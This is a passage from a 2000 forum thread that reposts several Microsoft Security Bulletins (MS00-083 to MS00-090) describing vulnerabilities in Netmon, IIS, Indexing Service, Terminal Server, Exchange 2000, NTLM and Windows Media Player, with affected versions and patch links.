If a malicious user delivered a specially-malformed frame to a server
that was monitoring network traffic, and the administrator parsed it
using an affected parser, it would have the effect of either causing
Netmon to fail or causing code of the malicious user's choice to run
on the machine.
Netmon requires administrative privileges to run, but should only be
run by local, rather than domain, administrators. If this is done,
the vulnerability could be used to gain complete control over the
local machine, but could not be used to gain control over a domain.
Netmon does not ship on workstation products, so unless SMS had been
installed on a workstation, it would not be affected by this
vulnerability.
Affected Software Versions
==========================
- Microsoft Windows NT 4.0 Server
- Microsoft Windows NT 4.0 Server, Terminal Server Edition
- Microsoft Windows NT 4.0 Server, Enterprise Edition
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Systems Management Server 1.2
- Microsoft Systems Management Server 2.0
Note: Netmon does not ship as part of Windows NT 4.0 Workstation or
Windows 2000 Professional. These products would only be affected if
SMS had been installed on them.
Patch Availability
==================
- Microsoft Windows NT 4.0 Server and Windows NT 4.0 Server,
Enterprise Edition:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25487
- Microsoft Windows NT 4.0 Server, Terminal Server Edition:
To be released shortly.
- Microsoft Windows 2000 Server, Advanced Server and
Datacenter Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25485
- Microsoft Systems Management Server 1.2:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25505
- Microsoft Systems Management Server 2.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25514
Note: Customers who are running SMS should apply the SMS patch,
regardless of the platform they are running on. Customers who are not
running SMS but are using an affected server should apply the
operating system patch.
Note:
- The patch for Windows NT 4.0 Server and Windows NT 4.0 Server,
Enterprise Edition, should be applied atop Service Pack 6a.
It will be included in Service Pack 7.
- The patch for Windows NT 4.0 Server, Terminal Server Edition,
should be applied atop Service Pack 6. It will be included in
Service Pack 7.
- The patch for Windows 2000 can be applied to computers running
Windows 2000 "Gold" or Service Pack 1. It will be included in
Windows Service Pack 2.
- The patch for SMS 1.2 should be applied atop SMS 1.2 Service
Pack 4.
- The patch for SMS 2.0 can be applied to SMS 2.0 Gold, Service
Pack 1, or Service Pack 2. It will be included in Service Pack 3.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-083,
http://www.microsoft.com/technet/security/bulletin/fq00-083.asp
- Microsoft Knowledge Base article Q274835 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks COVERT Labs at PGP Security, Inc.
http://www.pgp.com/ , and the ISS X-force http://xforce.iss.net/
for reporting this issue to us and working with us to protect
customers.
Revisions
=========
- November 01, 2000: Bulletin Created.
socalgal
11-02-2000, 06:52 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-084)
- --------------------------------------
Patch Available for "Indexing Services Cross Site Scripting"
Vulnerability
Originally posted: November 02, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Indexing Services for Windows 2000.
This vulnerability could allow a malicious web site operator to
misuse another web site as a means of attacking users.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-084.asp
Issue
=====
On February 20, 2000, Microsoft and the CERT Coordination Center
published information on a newly-identified security vulnerability
affecting all web server products. This vulnerability, known as
Cross-Site Scripting (CSS), results when web applications don't
properly validate inputs before using them in dynamic web pages. If a
malicious web site operator were able to lure a user to his site, and
had identified a third-party web site that was vulnerable to CSS, he
could potentially use the vulnerability to "inject" script into a web
page created by the other web site, which would then be delivered to
the user. The net effect would be to cause the malicious user's
script to run on the user's machine using the trust afforded the
other site.
The vulnerability can affect any software that runs on a web server,
accepts user input, and uses it to generate web pages without
sufficient validation. Microsoft has identified an Indexing Service
component (CiWebHitsFile) that, when called from a specially crafted
URL, is vulnerable to this scenario.
Affected Software Versions
==========================
- Microsoft Indexing Services for Windows 2000
NOTE: The Indexing Service ships and installs with Windows 2000, but
is not enabled by default. Users who are running web servers on
Windows 2000 who have enabled Indexing Services are urged to apply
this patch.
Patch Availability
==================
- Indexing Services for Windows 2000:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25517
NOTE: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-084,
http://www.microsoft.com/technet/security/bulletin/fq00-084.asp
- Information on Cross-Site Scripting Security Vulnerability,
http://www.microsoft.com/technet/security/crssite.asp.
- CERT(r) Advisory CA-2000-02: Malicious HTML Tags Embedded in
Client Web Requests,
http://www.cert.org/advisories/CA-2000-02.html
- Microsoft Knowledge Base article Q278499 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- November 02, 2000: Bulletin Created.
socalgal
11-02-2000, 10:03 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-060)
- --------------------------------------
Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
Originally posted: August 25, 2000
Updated: November 2, 2000
Summary
=======
On August 25, 2000, Microsoft released the original version of this
bulletin, to advise customers of the availability of a patch that
eliminates a vulnerability in Microsoft(r) Internet Information
Server. However, an additional variant of the vulnerability was
subsequently identified, and on November 2, 2000, the bulletin was
updated to advise customers of the availability of an updated patch.
The scope of the new vulnerability is exactly the same as that of the
originally-reported one. The updated patch eliminates all known
variants of the vulnerability. Customers who applied the original
version of the patch should apply the new version to ensure that they
are fully protected.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-060.asp
Issue
=====
On February 20, 2000, Microsoft and CERT published information on a
newly-identified security vulnerability affecting all web server
products. This vulnerability, known as Cross-Site Scripting (CSS),
results when web applications don't properly validate inputs before
using them in dynamic web pages. If a malicious web site operator
were able to lure a user to his site, and had identified a
third-party web site that was vulnerable to CSS, he could potentially
use the vulnerability to "inject" script into a web page created by
the other web site, which would then be delivered to the user. The
net effect would be to cause the malicious user's script to run on
the user's machine using the trust afforded the other site.
The vulnerability can affect any software that runs on a web server,
accepts user input, and blindly uses it to generate web pages.
Microsoft recommended that all vendors check their products to see if
any are affected by the vulnerability, and initiated a check of its
own products as well. Several features in IIS were found to be
affected - some were found by Microsoft internal teams, and others
were identified by customers - and this patch eliminates all of them.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Server 5.0
Patch Availability
==================
- Internet Information Server 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25534
- Internet Information Server 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25533
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-060,
http://www.microsoft.com/technet/security/bulletin/fq00-060.asp
- Information on Cross-Site Scripting Security Vulnerability,
http://www.microsoft.com/technet/security/crssite.asp.
- CERT(r) Advisory CA-2000-02: Malicious HTML Tags Embedded in
Client Web Requests,
http://www.cert.org/advisories/CA-2000-02.html
- Microsoft Knowledge Base article Q260347 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Microsoft thanks Peter Grundl of Defcom
www.defcom.com (http://www.defcom.com) for reporting the new variant of this issue to us
and working with us to protect customers.
Revisions
=========
- August 25, 2000: Bulletin Created.
- November 2, 2000: Bulletin updated to announce availability of a
patch to eliminate a new variant of this issue.
socalgal
11-03-2000, 04:57 AM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-085)
- --------------------------------------
Patch Available for "ActiveX Parameter Validation" Vulnerability
Originally posted: November 2, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows 2000. The vulnerability could
allow enable a malicious user to potentially run code on another
user's machine.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-085.asp
Issue
=====
An ActiveX control that ships as part of Windows 2000 contains an
unchecked buffer. If the control was called from a web page or HTML
mail using a specially-malformed parameter, it would be possible to
cause code to execute on the machine via a buffer overrun. This could
potentially enable a malicious user to take any desire action on the
user's machine, limited only by the permissions of the user.
The vulnerability could only be exploited if ActiveX controls are
enabled in IE, Outlook or Outlook Express. The Security Zones feature
in IE enables customers to limit what web sites can do, and customers
who have used the feature to prevent untrusted sites from invoking
ActiveX controls would be at minimal risk from the web-based attack
scenario. Customers who have applied the Outlook Security Update
would be protected against the mail-borne scenario, since it moves
mail into the Restricted Sites Zone, thereby preventing HTML mails
from invoking ActiveX controls.
Affected Software Versions
==========================
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server
Note Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-085,
http://www.microsoft.com/technet/security/bulletin/fq00-085.asp
- Microsoft Knowledge Base article Q278511 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks USSR Labs www.ussrback.com (http://www.ussrback.com) for reporting
this issue to us and working with us to protect customers.
Revisions
=========
- November 2, 2000: Bulletin Created.
socalgal
11-06-2000, 06:35 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-086)
- --------------------------------------
Patch Available for "Web Server File Request Parsing" Vulnerability
Originally posted: November 06, 2000
Summary
=======
Microsoft has released a patch that eliminates a serious security
vulnerability in Microsoft(r) Internet Information Services 5.0. The
vulnerability could enable a malicious user to run operating system
commands on an affected web server.
Microsoft strongly urges all customers using IIS 5.0 to apply the
patch immediately. IIS 4.0 is not affected by the vulnerability.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-086.asp
Issue
=====
When IIS receives a valid request for an executable file, it passes
the name of the requested file to the underlying operating system
for processing. However, due to an implementation flaw in IIS 5.0, it
is possible to create a specially-malformed file request that
contains both a file name and one or more operating system commands.
Upon receiving such a request, IIS 5.0 would pass the entire string
to the operating system, which would first process the file and then
execute the commands. The file would need to reside in a folder to
which the user had execute permissions, but it would not necessarily
need to be an executable file.
The ability to execute operating system commands on the web server
would enable a malicious user to take virtually any action that an
interactively-logged on user could take. Although this would not give
the malicious user administrative control over the server, it would
nevertheless enable him to cause widespread damage. He could, for
instance, add, delete or change files on the server, run code that
was already on the server, or upload code of his choice and run it.
Microsoft strongly recommends that all customers running IIS 5.0
immediately apply the patch for this vulnerability. The patch also
eliminates the "Web Server Directory Traversal" vulnerability
discussed in Microsoft Security Bulletin MS00-078. IIS 4.0 is not
affected by the vulnerability, and IIS 4.0 customers do not need to
take any action.
Affected Software Versions
==========================
- Microsoft Internet Information Service 5.0
Note: IIS 4.0 is not affected by the vulnerability.
Note: This patch can be applied atop system running either Windows
2000 Gold or Service Pack 1. It will be included in Windows 2000
Service Pack 2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-086,
http://www.microsoft.com/technet/security/bulletin/fq00-086.asp
- Microsoft Knowledge Base article Q277873 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks NSFocus http://www.nsfocus.com for reporting this
issue to us and working with us to protect customers.
Revisions
=========
- November 06, 2000: Bulletin Created.
socalgal
11-09-2000, 05:01 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS00-087)
- --------------------------------------
Patch Available for "Terminal Server Login Buffer Overflow"
Vulnerability
Originally posted: November 08, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows NT 4.0 Terminal Server. The
vulnerability could allow a malicious user to cause the Terminal
Server to fail or, in certain instances, to execute hostile code on
the server.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-087.asp
Issue
=====
An unchecked buffer in the Terminal Server login prompt could allow a
malicious user to cause the Terminal Server to execute arbitrary
code. The ability to execute arbitrary code would enable the
malicious user to add, change, or delete data, run code already on
the server, or upload new code to the server and run it. The
malicious user would not need to successfully login to the Terminal
Server in order to initiate this attack.
This vulnerability could be exploited remotely if connection requests
are not filtered. By default, Terminal Server listens on tcp port
3389. This port should be blocked at the firewall and/or router if
Terminal Server access from the Internet is not required.
Affected Software Versions
==========================
- Microsoft Windows NT 4.0 Terminal Server
Patch Availability
==================
- Microsoft Windows NT 4.0 Terminal Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25565
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-087
http://www.microsoft.com/technet/security/bulletin/fq00-087.asp
- Microsoft Knowledge Base article Q277910 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Bruno Acselrad of CORE SDI www.core-sdi.com (http://www.core-sdi.com) for
reporting this issue to us and working with us to protect customers.
Revisions
=========
November 08, 2000: Bulletin Created.
socalgal
11-16-2000, 07:50 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-088)
- --------------------------------------
Patch Available for "Exchange User Account" Vulnerability
Originally posted: November 16, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Exchange 2000 Server and Exchange 2000
Enterprise Server. This vulnerability could potentially allow an
unauthorized user to remotely login to an Exchange 2000 server and
possibly other servers on the affected computer's network.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-088.asp
Issue
=====
In early shipments of Exchange 2000, setup creates an account with a
known username and password. If a malicious user learned the username
and password, he or she could log onto the account. Under normal
circumstances, this account only has local user rights - it is not a
privileged account and cannot access Exchange 2000 data. However, if
Exchange 2000 were installed on a Domain Controller, the account
would also have Domain user privileges, and could thus gain access to
other resources in the affected Domain. Nevertheless, he would still
be restricted from accessing Exchange 2000 data.
To eliminate the security vulnerability, Microsoft has provided a
manual procedure, discussed in the FAQ, and a tool to protect our
customers. Microsoft also recommends that customers affected by this
vulnerability disable or delete this account after setup completes.
In addition, Exchange 2000 SP1 will contain a fix that removes this
vulnerability.
Affected Software Versions
==========================
- Microsoft Exchange 2000 Server CDs without "Rev. A" stamped on the
CD on the line below the Part No.
- Microsoft Exchange 2000 Enterprise Server CDs without "Rev. A"
stamped on the CD below the Part No.
Note: This also applies to evaluation editions and to Microsoft
Exchange 2000 Server and Microsoft Exchange 2000 Enterprise Server
included on the October 2000 Select CDs.
Patch Availability
==================
- The Tool can be downloaded from:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25866
Note Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-088,
http://www.microsoft.com/technet/security/bulletin/fq00-088.asp
- Microsoft Knowledge Base (KB) article Q278523,
http://www.microsoft.com/technet/support/kb.asp?ID=278523
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- November 16, 2000: Bulletin Created.
socalgal
11-20-2000, 06:45 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Patch Available for "Session ID Cookie Marking" Vulnerability
Originally posted: October 23, 2000
Updated: November 20, 2000
Summary
=======
On October 23, 2000, Microsoft released the original version of this
bulletin, to discuss the availability of a patch that eliminates a
security vulnerability in Microsoft(r) Internet Information Server.
The vulnerability could allow a malicious user to "hijack" another
user's secure web session, under a very restricted set of
circumstances.
On November 20, 2000, we re-released the bulletin to advise customers
using IIS 4.0 on Alpha platforms, or IIS 5.0 on x86 platforms, that
new versions of these patch are available, to correct an error in the
original version of the patch. The x86 IIS 4.0 patch was not affected
by the error, and customers using these systems do not need to take
any action.
Frequently asked questions regarding this vulnerability and
the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-080.asp
Issue
=====
IIS supports the use of a Session ID cookie to track the current
session identifier for a web session. However, .ASP in IIS does not
support the creation of secure Session ID cookies as defined in RFC
2109. As a result, secure and non-secure pages on the same web site
use the same Session ID. If a user initiated a session with a secure
web page, a Session ID cookie would be generated and sent to the
user, protected by SSL. But if the user subsequently visited a
non-secure page on the same site, the same Session ID cookie would be
exchanged, this time in plaintext. If a malicious user had complete
control over the communications channel, he could read the plaintext
Session ID cookie and use it to connect to the user's session with
the secure page. At that point, he could take any action on the
secure page that the user could take.
The conditions under which this vulnerability could be exploited are
rather daunting. The malicious user would need to have complete
control over the other user's communications with the web site. Even
then, the malicious user could not make the initial connection to the
secure page - only the legitimate user could do that. The patch
eliminates the vulnerability by adding support for secure Session ID
cookies in .ASP pages. (Secure cookies already are supported for all
other types of cookies, under all other technologies in IIS).
The original version of patches for IIS 4.0 Alpha and the IIS 5.0
systems did not install correctly. The IIS 4.0 x86 version of the
patch does install correctly.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Services 5.0
Patch Availability
==================
- IIS 4.0:
x86 platforms:
http://www.microsoft.com/ntserver/nts/downloads/critical/q274149
Alpha platforms:
Available from Microsoft Product Support Services
- IIS 5.0:
http://www.microsoft.com/Windows2000/downloads/critical/q274149
Note: The patch installs support for secure Session ID cookies, but
does not enable it for reasons of application compatibility. As
discussed in the Knowledge Base article, it can be enabled or
disabled on a site-by-site basis.
Note:
- The IIS 4.0 version of this patch can be installed on Windows
NT 4.0 systems running Service Pack 6a, and will be included
in Service Pack 7.
- The IIS 5.0 version of this patch can be installed on Windows
2000 systems with or without Service Pack 1, and will be
included in Service Pack 2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-080,
http://www.microsoft.com/technet/security/bulletin/fq00-080.asp
- Microsoft Knowledge Base article Q274149 discusses this issue
and will be available soon.
- RFC 2109, HTTP State Management,
http://www.ietf.org/rfc/rfc2109.txt.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks ACROS Security http://www.acros.si/ and Ron Sires
and C. Conrad Cady of Healinx http://www.healinx.com/ for reporting
this issue to us and working with us to protect customers.
Revisions
=========
- October 23, 2000: Bulletin Created.
- November 20, 2000: Bulletin updated to indicate availability of
updated patches for IIS 4.0 on Alpha platforms, and IIS 5.0
on x86 platforms.
socalgal
11-21-2000, 08:27 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-086)
- --------------------------------------
Patch Available for "Web Server File Request Parsing" Vulnerability
Originally posted: November 06, 2000
Updated: November 21, 2000
Summary
=======
On November 06, 2000, Microsoft released the original version of this
bulletin, announcing the availability of a patch that eliminates a
security vulnerability in Microsoft(r) Internet Information Services
5.0. The vulnerability could enable a malicious user to run
operating system commands on a web server. On November 10, 2000, we
updated the bulletin to clarify the scope of the issue. On November
21, 2000, we updated it again, to discuss two newly-discovered
variants of the original vulnerability.
The new variants don't change the effect of exploiting the
vulnerability. However, they do affect a larger number of products.
The original variant affected IIS 5.0 in all cases, but only affected
IIS 4.0 when a service pack prior to Windows NT 4.0 Service Pack 6a
was in use. The new variants affect both IIS 4.0 and IIS 5.0
regardless of the service pack is in use. Microsoft recommends that
all affected customers apply the new versions of the patches.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-086.asp
Issue
=====
When IIS receives a valid request for an executable file, it passes
the name of the requested file to the underlying operating system
for processing. However, due to an implementation flaw, it is
possible to create a specially-malformed file request that contains
both a file name and one or more operating system commands. Upon
receiving such a request, IIS would pass the entire string to the
operating system, which would first process the file and then execute
the commands.
The ability to execute operating system commands on the web server
would enable a malicious user to take virtually any action that an
interactively-logged on user could take. Although this would not give
the malicious user administrative control over the server, it would
nevertheless enable him to cause widespread damage. He could, for
instance, add, delete or change files on the server, run code that
was already on the server, or upload code of his choice and run it.
There are three signficant restrictions on type of file request that
could be used to exploit this vulnerability:
- The malicious user would need to request a .bat or .cmd file.
- The file would need to exist.
- The malicious user would need to have execute permissions on
the file.
Although these restrictions limit the scope of the vulnerability, it
is important not to discount it. Many third-party software products
for web servers install batch files by default. As a result,
Microsoft recommends that all customers running affected versions of
IIS verify whether their systems contain any .bat or .cmd files that
can be executed by visitors to the site, and apply the patch
immediately if this is the case. The patch for this issue also
eliminates the "Web Server Directory Traversal" vulnerability
discussed in Microsoft Security Bulletin MS00-078.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Services 5.0
Patch Availability
==================
- Internet Information Server 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q277873
- Internet Information Services 5.0:
http://www.microsoft.com/Windows2000/downloads/critical/q277873
Note: The IIS 5.0 patch can be applied atop systems running either
Windows 2000 Gold or Service Pack 1. It will be included in Windows
2000 Service Pack 2.
Note: The IIS 4.0 patch can be applied atop systems running Windows
NT 4.0 Service Pack 6a. It will be included in Windows NT 4.0
Service Pack 7.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-086,
http://www.microsoft.com/technet/security/bulletin/fq00-086.asp
- Microsoft Knowledge Base (KB) article Q277873,
http://www.microsoft.com/technet/support/kb.asp?ID=277873
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks NSFocus http://www.nsfocus.com for reporting the
original and new variants of this vulnerability to us and working
with us to protect customers.
Revisions
=========
- November 06, 2000: Bulletin Created.
- November 10, 2000: Bulletin updated to indicate that IIS 4.0
is affected when running on pre-SP6 versions of Windows NT 4.0,
and to provide information on additional restrictions on the
vulnerability.
- November 21, 2000: Bulletin updated to discuss availability of
patch
that addresses new variants of vulnerability.
socalgal
11-21-2000, 08:32 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-089)
- --------------------------------------
Patch Available for "Domain Account Lockout" Vulnerability
Originally posted: November 21, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows 2000. The vulnerability could
allow a malicious user to use repeated attempts to guess an account
password even if the domain administrator had set an account lockout
policy.
Frequently asked questions regarding this vulnerability and
the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-089.asp
Issue
=====
A flaw in the way that NTLM authentication operates in Windows 2000
could allow a domain account lockout policy to be bypassed on a
local Windows 2000 machine, even if the domain administrator had set
such a policy. The ability of a malicious user to avoid the domain
account lockout policy could increase the threat from a brute force
password-guessing attack.
This vulnerability only affects Windows 2000 machines that are
members of non-Windows 2000 domains. In addition, the vulnerability
only affects domain user accounts that have previously logged into
the target machine and already have cached credentials established on
that machine. If a domain account lockout policy is in place and an
attacker attempts a brute force password-guessing attack, the domain
user account will be locked out as expected at the domain
controller. However, if the attacker is able find the correct
password, the local Windows 2000 machine will log the attacker on
using cached credentials in violation of the account lockout policy.
Although the attacker would be able to log on to the local machine,
he or she would not be able to authenticate to the domain or gain
access to resources on other machines in the domain.
Affected Software Versions
==========================
- Microsoft Windows 2000 Professional, Service Pack 1
- Microsoft Windows 2000 Server, Service Pack 1
- Microsoft Windows 2000 Advanced Server, Service Pack 1
- Microsoft Windows 2000 Datacenter, Service Pack 1
Note Windows 2000 Gold is not affected by this vulnerability.
Note: Windows 2000 users connected to a Windows 2000 domain, stand
alone Windows 2000 machines, and users of NT 4.0 do not need to take
any action.
Note: The Windows 2000 patch can be applied to systems running
Windows 2000 Service Pack 1. Users of Windows 2000 Gold are not
affected and do not need to take any action. This patch will be
included in Windows 2000 Service Pack 2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-089,
http://www.microsoft.com/technet/security/bulletin/fq00-089.asp
- Microsoft Knowledge Base article Q274372 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Finch Brett (mailto:brett.finch@hrs.ualberta.ca),
Human Resources, University of Alberta, for reporting this issue to
us and working with us to protect customers.
Revisions
=========
- November 21, 2000: Bulletin Created.
socalgal
11-23-2000, 09:02 AM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-090)
- --------------------------------------
Patch Available for ".ASX Buffer Overrun" and ".WMS Script Execution"
Vulnerabilities
Originally posted: November 22, 2000
Summary
=======
Microsoft has released a patch that eliminates two security
vulnerabilities in Microsoft(r) Windows Media(tm) Player. These
vulnerabilities could potentially enable a malicious user to cause a
program of his choice to run on another user's computer.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-090.asp
Issue
=====
The two vulnerabilities discussed below are unrelated to each other
except by the fact that they both affect Windows Media Player. We
packaged them in a single patch to make it more convenient for
customers to apply. The vulnerabilities are:
- The ".ASX Buffer Overrun" vulnerability. Windows Media
Player supports the use of Active Stream Redirector (.ASX)
files to enable users to play streaming media that resides
on intranet or Internet sites. However, the code that parses
.ASX files has an unchecked buffer, and this could potentially
enable a malicious user to run code of his choice on the
machine of another user. The malicious user could either send
an affected file to another user and entice her to run or
preview it, or he could host such a file on a web site and
cause it to launch automatically whenever a user visited the
site. The code could take any action on the machine that the
legitimate user herself could take.
- The ".WMS Script Execution" vulnerability. Windows Media
Player 7 introduced a feature called "skins", that allows
customization of the look and feel of Windows Media Player.
However, a custom skin (.WMS) file could potentially include
script, which would execute if Windows Media Player was run
and that skin was selected. A malicious user could either send
a customized skin containing script to another user and try to
entice her into using it, or he could host such a file on a web
site and cause it to launch automatically whenever a user
visited the site. Because the code would reside on the user's
local machine, it would be able to execute ActiveX controls,
including ones not marked "safe for scripting". This would
enable the code to take any action that can be accomplished
via an ActiveX control.
Affected Software Versions
==========================
- Microsoft Windows Media Player 6.4
- Microsoft Windows Media Player 7
Note: The ".ASX Buffer Overrun" affects Windows Media Player versions
6.4 and 7. The ".WMS Script Execution" affects only Windows Media
Player version 7. The patch installs the correct fix(es) for the
particular version of Windows Media Player in use.
Patch Availability
==================
- Windows Media Player 6.4:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069
- Windows Media Player 7:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067
Note: The fix for this issue also will be available as part of the
next periodic update, scheduled for December 2000.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-090,
http://www.microsoft.com/technet/security/bulletin/fq00-090.asp
